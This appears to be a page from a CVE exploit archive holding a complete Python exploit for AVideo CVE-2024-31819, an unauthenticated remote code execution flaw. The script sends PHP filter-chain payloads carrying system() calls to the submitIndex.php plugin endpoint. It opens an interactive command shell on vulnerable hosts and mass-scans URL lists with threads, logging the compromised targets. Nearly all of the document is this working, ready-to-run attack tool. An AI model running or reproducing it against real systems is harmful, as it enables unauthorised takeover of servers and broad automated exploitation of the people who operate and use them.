4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import re
import requests
import argparse

from packaging import version
from rich.console import Console
from alive_progress import alive_bar
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from php_filter_chain import PHPFilterChainGenerator
from concurrent.futures import ThreadPoolExecutor, as_completed

requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)


class AVideoExploit:
    def __init__(self, base_url):
        self.console = Console()
        self.base_url = base_url

    def custom_print(self, message: str, header: str) -> None:
        header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
        self.console.print(
            f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}"
        )

    def generate_php_filter_payload(self, command):
        generator = PHPFilterChainGenerator()
        return generator.generate_filter_chain(command)

    def send_payload(self, payload):
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        try:
            response = requests.post(
                f"{self.base_url}/plugin/WWBNIndex/submitIndex.php",
                data={"systemRootPath": payload},
                headers=headers,
                verify=False,
                timeout=10,
            )
            if response.status_code == 200:
                return response.text
            else:
                return False
        except requests.exceptions.RequestException as e:
            return False

    def parse_output(self, output):
        match = re.search(r"\[S\](.*?)\[E\]", output, re.DOTALL)
        if match:
            return match.group(1).strip()
        else:
            return None

    def interactive_shell(self):
        session = PromptSession(history=InMemoryHistory())
        while True:
            try:
                cmd = session.prompt(
                    HTML("<ansiyellow><b>$ </b></ansiyellow>"), default=""
                ).strip()
                if cmd.lower() == "exit":
                    break
                if cmd.lower() == "clear":
                    self.console.clear()
                    continue

                php_code = f"<?php echo '[S]';system('{cmd}');echo '[E]';?>"
                payload = self.generate_php_filter_payload(php_code)
                output = self.send_payload(payload)

                if output:
                    clean_output = self.parse_output(output)
                    if clean_output:
                        print(f"{clean_output}\n")
                    else:
                        self.custom_print(
                            "No command output returned or error occurred.", "-"
                        )
                else:
                    self.custom_print(
                        "Failed to receive response from the server.", "-"
                    )

            except KeyboardInterrupt:
                self.custom_print("Exiting interactive shell...", "!")
                break

    def check_single_url(self, url):
        try:
            version_status, avideo_version = self.is_version_vulnerable(url)
            if version_status:
                php_code = "<?php echo '[S]';system('whoami');echo '[E]';?>"
                payload = self.generate_php_filter_payload(php_code)
                headers = {"Content-Type": "application/x-www-form-urlencoded"}
                response = requests.post(
                    f"{url}/plugin/WWBNIndex/submitIndex.php",
                    data={"systemRootPath": payload},
                    headers=headers,
                    verify=False,
                    timeout=10,
                )
                if response.status_code == 200:
                    output = self.parse_output(response.text)
                    if output:
                        return (
                            f"{url} is vulnerable, Version: {avideo_version}, Command output: {output}\n",
                            True,
                        )
                return (
                    f"{url} is not vulnerable or failed to execute command, Version: {avideo_version}\n",
                    False,
                )
            elif avideo_version:
                return (
                    f"{url} Version: {avideo_version} is not within the vulnerable range.\n",
                    False,
                )
            else:
                return (
                    f"{url} AVideo version could not be determined. Manual check advised.\n",
                    False,
                )
        except requests.exceptions.RequestException:
            return (f"{url} Request failed.\n", False)

    def check_avideo_version(self, url):
        try:
            response = requests.get(url, verify=False, timeout=10)
            version_pattern = re.compile("Powered by AVideo ® Platform v([\d.]+)")
            match = version_pattern.search(response.text)
            if match:
                return match.group(1)

            comment_version_pattern = re.compile(r"<!--.*?v:([\d.]+).*?-->", re.DOTALL)
            comment_match = comment_version_pattern.search(response.text)
            if comment_match:
                return comment_match.group(1)

        except requests.exceptions.RequestException as e:
            return None

    def is_version_vulnerable(self, url):
        avideo_version_str = self.check_avideo_version(url)
        if avideo_version_str is None:
            return True, "unknown"

        parsed_version = version.parse(avideo_version_str)
        if isinstance(parsed_version, version.Version):
            is_vulnerable = (
                version.parse("12.4") <= parsed_version <= version.parse("14.2")
            )
            return is_vulnerable, avideo_version_str
        else:
            return True, avideo_version_str

    def check_urls_and_write_output(self, urls, max_workers, output_path):
        with ThreadPoolExecutor(max_workers=max_workers) as executor, alive_bar(
            len(urls), enrich_print=False
        ) as bar:
            futures = {executor.submit(self.check_single_url, url): url for url in urls}
            for future in as_completed(futures):
                result, is_vulnerable = future.result()
                if is_vulnerable:
                    self.custom_print(result, "+")
                    if output_path:
                        with open(output_path, "a") as file:
                            file.write(result)
                bar()

        if output_path:
            print(f"Results written to {output_path}")


def main():
    parser = argparse.ArgumentParser(
        description="AVideo CVE-2024-31819 - Unauthenticated Remote Code Execution"
    )
    parser.add_argument("-u", "--url", help="Base URL for single target", default=None)
    parser.add_argument(
        "-f", "--file", help="File containing list of URLs", default=None
    )
    parser.add_argument(
        "-t", "--threads", help="Number of threads to use", type=int, default=20
    )
    parser.add_argument(
        "-o", "--output", help="Output file to save results", default=None
    )

    args = parser.parse_args()

    if not args.url and not args.file:
        print(
            "Error: No URL or file provided. Use -u to specify a single URL or -f to specify a file containing URLs."
        )
        return

    avideo = AVideoExploit(args.url)

    if args.url:
        is_vulnerable_version, avideo_version = avideo.is_version_vulnerable(args.url)
        proceed_with_check = True

        if avideo_version != "unknown":
            if is_vulnerable_version:
                avideo.custom_print(
                    f"Version {avideo_version} is within the vulnerable range. Proceeding with vulnerability check.",
                    "+",
                )
            else:
                avideo.custom_print(
                    f"Version {avideo_version} is not within the vulnerable range. Detected version: {avideo_version}",
                    "-",
                )
                proceed_with_check = False
        else:
            avideo.custom_print(
                "Unable to determine AVideo version. Proceeding with vulnerability check as a precaution.",
                "!",
            )

        if proceed_with_check:
            output, is_vulnerable = avideo.check_single_url(args.url)
            if is_vulnerable:
                avideo.custom_print(output, "+")
                avideo.interactive_shell()
            else:
                avideo.custom_print(
                    "The URL is not vulnerable or failed to execute the command.", "-"
                )

    elif args.file:
        with open(args.file, "r") as f:
            urls = f.read().splitlines()
            avideo.check_urls_and_write_output(urls, args.threads, args.output)


if __name__ == "__main__":
    main()